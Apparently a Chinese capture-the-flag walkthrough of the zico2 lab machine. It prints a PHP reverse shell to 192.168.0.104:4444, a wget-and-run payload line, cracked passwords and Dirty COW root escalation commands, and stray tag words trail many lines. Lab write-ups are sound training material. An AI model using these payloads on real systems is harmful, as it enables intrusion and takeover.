zico2靶機練習

參考:https://blog.csdn.net/qq_38684504/article/details/90105790 php

運行環境:viirtualbox html

網絡:橋接模式 python

主機發現 git

主機掃描 github

目錄掃描 shell

弱口令(admin)登陸 數據庫

存在兩個帳號 apache

somd5.com解密 vim

root    653F4B285089453FE00E2AAFAC573414(34kroot34) bash

zico    96781A607F4E9F5F423AC01F0DAB0EBD(zico2215@)

瀏覽網站,發現存在文件包含漏洞

在網站數據庫中上傳腳本文件來獲取靶機的shell

root@kali:~# cd /var/www/html

root@kali:/var/www/html# vim shell.txt

root@kali:/var/www/html# cat shell.txt

<?php $sock=fsockopen("192.168.0.104",4444);exec("/bin/sh -i <&3 >&3 2>&3");?>

root@kali:/var/www/html# /etc/init.d/apache2 start

<?php system("wget 192.168.0.104/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>

訪問數據庫文件就可得到shell

目標主機存在python環境

$ python -c 'import pty;pty.spawn("/bin/bash")'

髒牛提權,exp提示

// To use this exploit modify the user values according to your needs.

// The default is "firefart".

// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):

// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c

// Compile with:

// gcc -pthread dirty.c -o dirty -lcrypt

// Then run the newly create binary by either doing:

// "./dirty" or "./dirty my-new-password"

// Afterwards, you can either "su firefart" or "ssh firefart@..."

// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!

// mv /tmp/passwd.bak /etc/passwd

www-data@zico:/tmp$ wget http://192.168.0.103/dirty.c

www-data@zico:/tmp$ gcc -pthread dirty.c -o exp -lcrypt

www-data@zico:/tmp$ ./exp JKding233

看以看到提權成功

root目錄下發現flag

home目錄下

使用zico用戶能夠進行ssh登陸

相關文章
相關標籤/搜索